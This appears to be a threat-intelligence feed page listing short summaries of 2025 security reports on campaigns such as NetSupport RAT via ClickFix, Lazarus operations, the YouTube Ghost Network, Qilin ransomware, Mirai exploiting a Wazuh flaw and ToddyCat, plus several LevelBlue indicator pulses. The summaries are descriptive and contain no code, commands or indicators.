LATEST THREAT INTELLIGENCE.
Unpacking NetSupport RAT Loaders Delivered via ClickFix
Description: eSentire's Threat Response Unit observed multiple threat groups utilizing NetSupport Manager for malicious purposes throughout 2025. These groups have shifted from Fake Updates to ClickFix as their primary delivery method. The attack methodology involves social engineering victims to execute malicious commands in the Windows Run Prompt, leading to NetSupport extraction and execution. Three distinct threat groups were identified, each using different loaders and infrastructure. The groups are designated by their licensee names: EVALUSION, FSHGDREE32/SGI, and XMLCTL. The analysis includes details on the PowerShell/JSON-based loader, MSI-based loader, and NetSupport PCAP analysis. An unpacking utility and YARA rule are provided to aid researchers in detecting and analyzing NetSupport variants.
Created at: 2025-10-24T04:30:26.227000
Updated at: 2025-11-23T04:04:55.572000
Gotta fly: Lazarus targets the UAV sector
Description: ESET researchers have uncovered a new instance of Operation DreamJob, a campaign attributed to the North Korea-aligned Lazarus group, targeting European defense companies involved in UAV technology. The attacks align with North Korea's efforts to enhance its drone program, likely aiming to steal proprietary information and manufacturing know-how. The campaign uses social engineering tactics, trojanized open-source projects, and deploys the ScoringMathTea RAT. The attackers' toolset includes various droppers, loaders, and downloaders, with a focus on UAV-related targets. This activity highlights the ongoing threat posed by Lazarus and North Korea's interest in advancing its drone capabilities through cyberespionage.
Created at: 2025-10-23T13:51:03.909000
Updated at: 2025-11-22T13:02:55.206000
Dissecting YouTube's Malware Distribution Network
Description: Check Point Research uncovered a sophisticated malware distribution campaign operating on YouTube, dubbed the YouTube Ghost Network. This network utilizes over 3,000 malicious videos to spread malware, primarily targeting users seeking game cheats and pirated software. The operation involves compromised accounts with specific roles: video uploaders, community posters, and interaction simulators. The network has been active since 2021, with a significant increase in activity in 2025. It mainly distributes infostealer malware, with Lumma and Rhadamanthys being prevalent. The campaign employs various tactics to evade detection, including password-protected archives and frequent updates to payloads and C2 infrastructure. This research highlights the evolving nature of malware distribution methods and the need for enhanced cybersecurity measures.
Created at: 2025-10-23T13:51:01.754000
Updated at: 2025-11-22T13:02:55.206000
Agenda Ransomware Deploys Linux Variant on Windows Systems Through Remote Management Tools and BYOVD Techniques
Description: Agenda ransomware group, also known as Qilin, has been deploying a Linux-based ransomware binary on Windows hosts using legitimate remote management and file transfer tools. This cross-platform execution technique bypasses Windows-centric detections and security solutions. The attack chain includes the use of BYOVD for defense evasion, deployment of multiple SOCKS proxy instances for C&C traffic obfuscation, and targeted theft of backup credentials. Agenda has affected 591 victims across 58 countries since January 2025, primarily targeting organizations in developed markets and high-value industries. The group's sophisticated approach combines legitimate tools, cross-platform execution, and strategic targeting of backup infrastructure, making detection significantly more challenging for organizations.
Created at: 2025-10-23T13:51:01.240000
Updated at: 2025-11-22T13:02:55.206000
Mirai Botnet Propagation and Exploitation of CVE-2025-24016
Description: The Mirai botnet continues to spread as operators repurpose old source code and exploit newly published vulnerabilities. The CVE program, while beneficial, sometimes inadvertently highlights overlooked vulnerabilities. Researchers' attempts to educate through PoCs often lead to negative outcomes, emphasizing the importance of timely patching. CVE-2025-24016 affects active Wazuh servers running outdated versions, and patching to version 4.9.1 or later is highly recommended. The report includes IOCs, Snort rules, and Yara rules for two Mirai-based botnets, detailing their C2 infrastructure, malicious domains, and file hashes.
Created at: 2025-10-23T13:40:08.722000
Updated at: 2025-11-22T13:02:55.206000
Analysis of APT-C-26 (Lazarus) Group's Attack Campaign Using Remote IT Disguise to Deploy Monitoring Software
Description: The report details an attack campaign by APT-C-26 (Lazarus), a highly active APT group targeting various industries globally. The group deployed a customized monitoring program with remote desktop control capabilities, likely used by remote IT personnel infiltrating target companies. The malware consists of a registration program, a daemon process, and a DLL file for core monitoring functions. It utilizes Windows Shell extension for persistence and creates a covert remote desktop environment. The analysis reveals sophisticated techniques for evading detection, including disabling Windows Defender and manipulating firewall rules. The monitoring software captures screen data, uploads it to a server, and provides remote desktop functionality. Based on the analysis and tactics used, the activity is attributed to the Lazarus group.
Created at: 2025-11-21T22:11:40.327000
Updated at: 2025-11-21T22:12:37.479000
New Tools and Techniques of ToddyCat APT
Description: The ToddyCat APT group has evolved its methods to gain covert access to corporate email. The report details their use of PowerShell-based TomBerBil for extracting browser data, TCSectorCopy for copying Outlook OST files, and attempts to steal OAuth tokens from Microsoft 365 processes. These tools allow the attackers to bypass security monitoring and access email data both on-premises and in the cloud. The group's tactics include using SMB to remotely access files, dumping process memory, and searching for access tokens. Detection recommendations are provided for each technique.
Created at: 2025-11-21T14:38:00.696000
Updated at: 2025-11-21T22:07:56.899000
Infrastructure of Interest: Medium Confidence Detection
Description: These indicators of compromise (IOCs) were identified through LevelBlue Labs' proprietary collection and threat hunting processes, leveraging AI-driven heuristics to detect anomalous patterns, behavioral analysis of malicious activity, and cross-referenced intelligence from endpoint telemetry and external sources. Use this data to enhance detection rules, block malicious infrastructure, or correlate with existing incident investigations. These indicators have been assigned a medium confidence level regarding their maliciousness. They are therefore subject to further review, and feedback is greatly appreciated.
Created at: 2025-08-07T07:39:42.586000
Updated at: 2025-11-21T20:36:30.443000
Infrastructure of Interest: Medium Confidence InfoStealer
Description: These indicators of compromise (IOCs) were identified through LevelBlue Labs' proprietary collection and threat hunting processes, leveraging AI-driven heuristics to detect anomalous patterns, behavioral analysis of malicious activity, and cross-referenced intelligence from endpoint telemetry and external sources. The IOCs included in this pulse are associated with infostealer malware, designed to harvest sensitive data such as credentials, cookies, and financial information from compromised systems. Use this data to enhance detection rules, block malicious infrastructure, or correlate with existing incident investigations involving data theft. These indicators have been assigned a medium confidence level regarding their maliciousness. They are therefore subject to further review, and feedback is greatly appreciated.
Created at: 2025-08-07T07:31:55.617000
Updated at: 2025-11-21T20:35:24.402000
Infrastructure of Interest: Medium Confidence Command And Control
Description: These indicators of compromise (IOCs) were identified through LevelBlue Labs' proprietary collection and threat hunting processes, leveraging AI-driven heuristics to detect anomalous patterns, behavioral analysis of malicious activity, and cross-referenced intelligence from endpoint telemetry and external sources. The IOCs included in this pulse are associated with command and control (C2) infrastructure, facilitating malware communication, data exfiltration, and persistent threat actor operations. Use this data to enhance detection rules, block malicious infrastructure, or correlate with existing incident investigations. These indicators have been assigned a medium confidence level regarding their maliciousness. They are therefore subject to further review, and feedback is greatly appreciated.
Created at: 2025-08-07T07:29:37.542000
Updated at: 2025-11-21T20:35:20.285000
